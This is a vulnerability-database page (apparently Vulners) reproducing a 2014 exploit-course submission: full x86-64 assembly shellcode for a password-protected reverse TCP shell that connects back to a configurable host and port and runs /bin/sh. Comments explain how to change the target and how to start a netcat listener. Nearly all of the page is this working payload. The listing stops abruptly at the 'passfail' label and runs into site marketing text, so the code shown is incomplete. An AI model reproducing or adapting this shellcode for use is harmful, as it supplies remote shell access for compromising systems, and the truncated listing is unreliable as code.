Vulners
Lucene search
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)
; ===================================================================
; Password Protected Reverse Shell
; Author: SLAE64-1351 (Keyman)
; Date: 04/09/2014
;
; Shellcode length: 136 bytes
;
; Description:
;
; Simple reverse shell (listens on port 4444 by default) with
; bytes password protection. Using a 4 bytes long password is
; still reasonably strong for a single-shot connection and keeps
; the code shorter.
;
; To change the port or the password just modify the values of the
; exp_port and exp_pass "variables" below.
;
; Before the code gets executed make sure to create a listener:
;
; nc -lvp <port number>
;
; After you receive the connection you will see no password
; prompt. Just type in the 4 bytes long password and hit enter.
; If the password matches, you are ready to type OS commands.
;
; ===================================================================
global _start
section .text
; -------------------------------------------------------------------
; Preprocessor directives so you can easily change the port and the
; password.
; -------------------------------------------------------------------
; Host to connect to. Please note that this value will have
; 0x02020202 added to it, this way avoiding the NULL bytes.
%define exp_host 0xFEFDFE7D ; 127.0.0.1
; Port number to listen on.
%define exp_port 0x5c11 ; 4444
; Password to use. Make sure it's not longer than 4 bytes.
%define exp_pass 0x6c6c6568 ; hell
; -------------------------------------------------------------------
; DO NOT TOUCH
; preprocessor directives so syscalls can be easily referenced
; -------------------------------------------------------------------
%define sys_connect 42
%define sys_read 0
%define sys_execve 59
%define sys_dup2 33
_start:
; ---------------------------------------------------------------
; START: create socket
; ---------------------------------------------------------------
xor rax, rax
push rax ; saving for sockaddr
push rax ; struct
push rax ; clear rax later
push rax ; set rdx to 0
pop rdx ; protocol
mov al, 2
push rax
push rax
pop rsi
pop rdi ; PF_INET
shr rsi, 1 ; SOCK_STREAM
add al, 39 ; socket syscall (41)
syscall
; ---------------------------------------------------------------
; START: create struct
;
; srv_addr.sin_family = AF_INET;
; srv_addr.sin_addr.s_addr = INADDR_ANY;
; srv_addr.sin_port = htons(portno);
;
; This is how it looks like on the stack:
; 0x02 0x00 0x11 0x5c 0x7f 0x00 0x00 0x01
; 0x20 0x00 0x00 0x00 0x00 0x00 0x00 0x00
; ---------------------------------------------------------------
; TODO: have to make this shorter somehow
mov byte [rsp], 2 ; set values
mov word [rsp+2], exp_port
mov dword [rsp+4], exp_host
add dword [rsp+4], 0x02020202
push rsp
pop rsi ; addr of struct in rsi
; ---------------------------------------------------------------
; START: connect
; ---------------------------------------------------------------
; rdx is still 0
push rax ; socket fd
pop rdi
add dl, 16
mov al, sys_connect
syscall
; ---------------------------------------------------------------
; get passwd
;
; We will work with a 4 byte password, should be more than
; enough as no brute forcing is possible. Chances to guess
; the right value is 0. Of course passwd should not contain
; null bytes.
;
; n = read(newsockfd,buffer,4);
; ---------------------------------------------------------------
push rax ; buffer filled with 0s
push rsp ; setup pointer to buf
pop rsi
sub rdx, 12 ; set bytes to read (4)
syscall
; compare pass received with valid pass and exit if no match
push rax
pop rcx
push rdi ; save socket
pop rax
sub rcx, 3 ; read only once
push rsp
pop rdi
push exp_pass
push rsp
pop rsi
cmpsq
jne passfail ; passwd match, give shell
shell:
; ---------------------------------------------------------------
; 6. exec shell
; ---------------------------------------------------------------
add cl, 2 ; rcx is 1, so add 2 = 3
push rax ; restore socket
pop rdi
dup_loop:
push rcx ; have to save rcx as dup2
; changes it's value
xor rax, rax
sub rcx, 1
push rcx
pop rsi
add al, sys_dup2
syscall
pop rcx ; restore the counter
loop dup_loop
jmp mytext
code:
pop rdi
mov [rdi+7], BYTE al
push rax
pop rdx
add al, sys_execve
syscall
mytext:
call code
MyText: db '/bin/sh', 0x41
passfail:Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Sep 2014 00:00Current
7.1High risk
Vulners AI Score7.1